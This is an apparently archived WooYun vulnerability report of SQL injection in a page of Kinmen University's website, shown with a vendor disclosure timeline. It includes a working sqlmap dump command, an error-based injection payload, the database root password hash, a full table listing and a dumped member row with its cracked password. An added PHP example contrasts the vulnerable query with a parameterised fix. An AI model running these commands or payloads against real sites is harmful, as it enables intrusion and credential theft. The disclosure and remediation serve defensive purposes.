WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
2015-10-23: Details reported to the vendor, awaiting vendor response
2015-10-24: Vendor confirmed; details disclosed to the vendor only
2015-11-03: Details disclosed to core white hats and relevant domain experts
2015-11-13: Details disclosed to regular white hats
2015-11-23: Details disclosed to intern white hats
2015-12-08: Details disclosed to the public
SQL injection in a page of Quemoy (Kinmen) University, Taiwan (DBA privileges / root password leak / 134 tables / user password leak)
sqlmap test URL: http://**.**.**.**/orgstuff/index.php?code=list&ids=1&launage=gb
python sqlmap.py -u "http://**.**.**.**/orgstuff/index.php?code=list&ids=1&launage=gb" -p ids --technique=E --random-agent -D km_kmit -T km_member -C ID,member_username,member_passwd,member_email --dump
---
Parameter: ids (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb
---
web application technology: PHP 5.6.7
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current user is DBA: True
database management system users [1]:
[*] 'root'@'localhost'

database management system users password hashes:
[*] root [1]:
    password hash: *063BBBCB4AFA236F83D1CDACC781DF3DDF0C4801

sqlmap resumed the following injection point(s) from stored session:
available databases [5]:
[*] information_schema
[*] km_kmit
[*] mysql
[*] performance_schema
[*] test

sqlmap resumed the following injection point(s) from stored session:
Database: km_kmit
[134 tables]
+-----------------------------------+
| km_album                          |
| km_album_category                 |
| km_article                        |
| km_article_class                  |
| km_article_custom_field           |
| km_article_custom_item            |
| km_article_custom_uniqidfieldlist |
| km_article_exchange               |
| km_article_group                  |
| km_article_type                   |
| km_attachment                     |
| km_attachment_category            |
| km_attachment_item                |
| km_attachment_order               |
| km_banner                         |
| km_banner_new                     |
| km_bexchange                      |
| km_block                          |
| km_blog                           |
| km_bookmember                     |
| km_calendar                       |
| km_calendar_content               |
| km_checkfile                      |
| km_chief_mailbox                  |
| km_chief_mailbox_log              |
| km_chief_mailbox_setemail         |
| km_conference                     |
| km_conference_content             |
| km_conference_discuss             |
| km_conference_hotel               |
| km_conference_news                |
| km_conference_photo               |
| km_conference_record              |
| km_conference_schedule            |
| km_conference_signup              |
| km_conference_traffic             |
| km_conference_travel              |
| km_conference_visit               |
| km_discuss                        |
| km_discuss_article                |
| km_download                       |
| km_ecard                          |
| km_ecard_category                 |
| km_epaper                         |
| km_epaper_channel                 |
| km_epaper_order                   |
| km_evaluate                       |
| km_evaluate_basic                 |
| km_evaluate_chief                 |
| km_evaluate_content               |
| km_evaluate_data                  |
| km_evaluate_download              |
| km_evaluate_item                  |
| km_evaluate_link                  |
| km_faq                            |
| km_faq_category                   |
| km_file                           |
| km_file_category                  |
| km_form                           |
| km_form_1                         |
| km_form_10                        |
| km_form_11                        |
| km_form_12                        |
| km_form_13                        |
| km_form_14                        |
| km_form_15                        |
| km_form_16                        |
| km_form_17                        |
| km_form_18                        |
| km_form_19                        |
| km_form_2                         |
| km_form_3                         |
| km_form_4                         |
| km_form_5                         |
| km_form_6                         |
| km_form_7                         |
| km_form_8                         |
| km_form_9                         |
| km_form_userlogin                 |
| km_formvalue                      |
| km_formvaluex                     |
| km_formx                          |
| km_frame                          |
| km_ftpuse                         |
| km_gbook                          |
| km_glossary                       |
| km_glossary_category              |
| km_hits                           |
| km_image                          |
| km_keywordcreate                  |
| km_kmit_back                      |
| km_layout                         |
| km_layout_change                  |
| km_lecture                        |
| km_lecture_category               |
| km_log                            |
| km_manager                        |
| km_manager_class                  |
| km_manager_group                  |
| km_manager_job                    |
| km_manager_mark                   |
| km_manager_online                 |
| km_member                         |
| km_member_group                   |
| km_modeblock                      |
| km_modefile                       |
| km_modelist                       |
| km_modestyle                      |
| km_modetext                       |
| km_module                         |
| km_module_category                |
| km_module_distribute              |
| km_module_frame                   |
| km_mybook                         |
| km_online                         |
| km_park                           |
| km_park_apply                     |
| km_park_centre                    |
| km_photo                          |
| km_reserve                        |
| km_reserve_member                 |
| km_rss                            |
| km_rss_unit                       |
| km_setting                        |
| km_sign_up                        |
| km_sign_up_user                   |
| km_style                          |
| km_teachermem                     |
| km_template                       |
| km_tradebook                      |
| km_webstyle                       |
| t_album                           |
| t_album_category                  |
| t_photo                           |
+-----------------------------------+

sqlmap resumed the following injection point(s) from stored session:
Database: km_kmit
Table: km_member
[15 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| address           | varchar(255) |
| disabled          | int(11)      |
| ID                | int(11)      |
| login_ip          | varchar(15)  |
| login_time        | int(11)      |
| member_audit      | int(11)      |
| member_audit_code | varchar(255) |
| member_birthday   | date         |
| member_email      | varchar(100) |
| member_idname     | varchar(250) |
| member_passwd     | varchar(50)  |
| member_realname   | varchar(50)  |
| member_sex        | varchar(10)  |
| member_username   | varchar(50)  |
| phone             | varchar(255) |
+-------------------+--------------+

sqlmap resumed the following injection point(s) from stored session:
Database: km_kmit
Table: km_member
[1 entry]
+----+-----------------+-------------------------------------------+--------------+
| ID | member_username | member_passwd                             | member_email |
+----+-----------------+-------------------------------------------+--------------+
| 1  | galio           | e10adc3949ba59abbe56e057f20f883e (123456) | <blank>      |
+----+-----------------+-------------------------------------------+--------------+
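The injection sqlmap exploited above is the classic string-concatenation pattern, and the report's remediation is to add filtering. This added example (not the site's code, which the report does not include) places that pattern next to a hardened version: an integer whitelist on ids, a bound parameter, server-side error handling, and a least-privilege database account, since the output shows the application running as root. Table and column names are taken from the sqlmap output; the account name, the DB_PASSWORD variable and the mysqlnd dependency are assumptions.

```php
<?php
// Added example, not the site's code (orgstuff/index.php is not on the page).
// Table/column names come from the sqlmap output; the DB account name and the
// DB_PASSWORD environment variable are placeholders; get_result()/fetch_all()
// assume the mysqlnd driver. Written to run on PHP 5.6 like the target.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // DB errors become exceptions
ini_set('display_errors', '0');                            // and are never echoed to clients

// Least privilege: the report shows the app connecting as root@localhost (DBA: True).
// A read-only account scoped to what this page needs limits the impact of any bug, e.g.
//   CREATE USER 'orgstuff_ro'@'localhost' IDENTIFIED BY '<strong password>';
//   GRANT SELECT ON km_kmit.km_member TO 'orgstuff_ro'@'localhost';
$db = new mysqli('localhost', 'orgstuff_ro', (string) getenv('DB_PASSWORD'), 'km_kmit');
$db->set_charset('utf8');

// Vulnerable pattern implied by the report: the raw ids value is spliced into the
// SQL text, so "1 AND (SELECT ... FLOOR(RAND(0)*2))x ... GROUP BY x)a)" executes as
// SQL, and with display_errors on the duplicate-entry error message that carries
// the CONCAT()ed value is printed straight into the page.
function list_member_vulnerable(mysqli $db, $ids)
{
    $sql = "SELECT ID, member_username, member_email FROM km_member WHERE ID = " . $ids;
    return $db->query($sql)->fetch_all(MYSQLI_ASSOC);
}

// Hardened: (1) reject anything that is not a positive integer before the query is
// built, (2) bind the value so it is treated as data, never as SQL, (3) log failures
// server-side so an error message can no longer act as the exfiltration channel.
function list_member_safe(mysqli $db, $ids)
{
    $id = filter_var($ids, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    if ($id === false) {
        http_response_code(400);
        return array();
    }
    try {
        $stmt = $db->prepare('SELECT ID, member_username, member_email FROM km_member WHERE ID = ?');
        $stmt->bind_param('i', $id);
        $stmt->execute();
        return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    } catch (mysqli_sql_exception $e) {
        error_log('km_member lookup failed: ' . $e->getMessage());
        http_response_code(500);
        return array();
    }
}

header('Content-Type: application/json');
echo json_encode(list_member_safe($db, isset($_GET['ids']) ? $_GET['ids'] : ''));
```

The same validate-then-bind treatment applies to the other request parameters on the page (code, launage); the integer check is only the right filter for ids.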
Fix suggestion: add filtering.
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-10-24 16:51
Vendor reply: Thanks for the report.
None yet.